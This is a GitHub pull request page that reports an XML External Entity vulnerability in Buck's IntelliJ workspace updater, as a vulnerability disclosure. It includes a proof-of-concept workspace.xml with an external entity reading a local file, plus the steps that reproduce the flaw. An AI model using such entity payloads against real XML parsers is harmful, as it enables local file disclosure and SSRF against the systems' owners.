search

facebook / buck

A fast build system that encourages the creation of small, reusable modules over a variety of platforms and languages.
https://buck.build
Apache License 2.0
8.56k stars 1.16k forks source link

fix "XXE vulnerability" #2743

Closed Crispy-fried-chicken closed 9 months ago

Crispy-fried-chicken commented 1 year ago

Security Vulnerability - Action Required: XXE vulnerability in the newest version of buck

Hi there,

I think the method com.facebook.buck.features.project.intellij.WorkspaceUpdater.createDocumentBuilder() may have an XXE vulnerability which is vulnerable in the newest version of buck. It shares similarities to a recent CVE disclosure CVE-2021-4295 in the "onc-healthit/code-validator-api" project.

Vulnerability Detail:

CVE Identifier: CVE-2021-4295

Description: A vulnerability classified as problematic was found in ONC code-validator-api up to 1.0.30. This vulnerability affects the vocabularyValidationConfigurations of the file src/main/java/org/sitenv/vocabularies/configuration/CodeValidatorApiConfiguration.java of the component XML Handler. The manipulation leads to xml external entity reference. Upgrading to version 1.0.31 is able to address this issue. The name of the patch is fbd8ea121755a2d3d116b13f235bc8b61d8449af. It is recommended to upgrade the affected component. VDB-217018 is the identifier assigned to this vulnerability.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-4295

Patch: https://github.com/onc-healthit/code-validator-api/commit/fbd8ea121755a2d3d116b13f235bc8b61d8449af

Vulnerability Description: The vulnerability is present in the class com.facebook.buck.features.project.intellij.WorkspaceUpdater of method createDocumentBuilder(), which is responsible for creating a document builder for parsing and processing XML documents. The vulnerable call chain we discover is: 

 updateOrCreateWorkspace()->updateExistingWorkspace(InputStream workspaceFile)->parseWorkspaceFile(InputStream workspaceFile)->createDocumentBuilder().parse(workspaceFile)

Given that the workspace.xml which stores the settings and state information of the workspace of an IntelliJ IDEA project is compromised by a hacker (e.g., using <!ENTITY entityname path>), the victim conducts regular build process which incorporates the execution of method updateOrCreateWorkspace(). As a consequence, the method createDocumentBuilder() will parse the compromised workspace.xml, resulting in an XML External Entity (XXE) Injection attack.

Proof of Concept : To facilitate demonstration, I create a PoC. The implementation steps of PoC are as follows:

  1. Prerequisites: To manually build Buck, download and install the following prerequisites:

  2. clone the buck project and build it: If all pre-preparations have been completed, execute the following command to clone and build the buck:

 git clone https://github.com/facebook/buck.git
 cd buck
 ant
 ./bin/buck build --show-output buck
 buck-out/gen/programs/buck.pex --help

  1. Move the project which has the workspace.xml file that is compromised by a hacker to the buck directory the content of the workspace.xml will be like:

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE project [
 <!ENTITY externalEntity SYSTEM "samples.txt">
]>
<project version="4">
 <component>
   &externalEntity;
 </component>
 <component name="ChangeListManager">
   <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
 </component>
</project>

    the codes hacker added are as follows:

    <!DOCTYPE project [
 <!ENTITY externalEntity SYSTEM "samples.txt">
]>
<project>
 <component>
   &externalEntity;
 </component>
</project>

    In this statement, the <!DOCTYPE> statement is used to specify the definition of the entity, where externalEntity is the name of the entity, and the path after the SYSTEM keyword specifies the location of the external file. Then, in the <component> tag, use &externalEntity; to refer to the entity, which will be replaced with the content of the external file when parsed.

    the file samples.txt is for demonstration, its content is as follows:

    you are in my control!!

    Besides, hackers can also construct external entities to obtain users' local files, perform Server-Side Request Forgery(SSRF) attacks, etc.

  2. Use the following command to generate project configuration files for IntelliJ IDEA :

    buck-out/gen/ce9b6f2e/programs/buck.pex project --ide intellij projectName

    Then the content of samples.txt will show in the .idea/workspace.xml because of the vulnerability I mentioned above. The content of the .idea/workspace.xml is as follows:

    <?xml version="1.0" encoding="UTF-8"?><project version="4">
 <component>
   you are in my control!!
 </component>
 <component name="ChangeListManager">
   <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
 </component>
</project>
facebook-github-bot commented 1 year ago

Hi @Crispy-fried-chicken!

Thank you for your pull request and welcome to our community.

Action Required

In order to merge any pull request (code, docs, etc.), we require contributors to sign our Contributor License Agreement, and we don't seem to have one on file for you.

Process

In order for us to review and merge your suggested changes, please sign at https://code.facebook.com/cla. If you are contributing on behalf of someone else (eg your employer), the individual CLA may not be sufficient and your employer may need to sign the corporate CLA.

Once the CLA is signed, our tooling will perform checks and validations. Afterwards, the pull request will be tagged with CLA signed. The tagging process may take up to 1 hour after signing. Please give it that time before contacting us about it.

If you have received this in error or have any questions, please contact us at cla@meta.com. Thanks!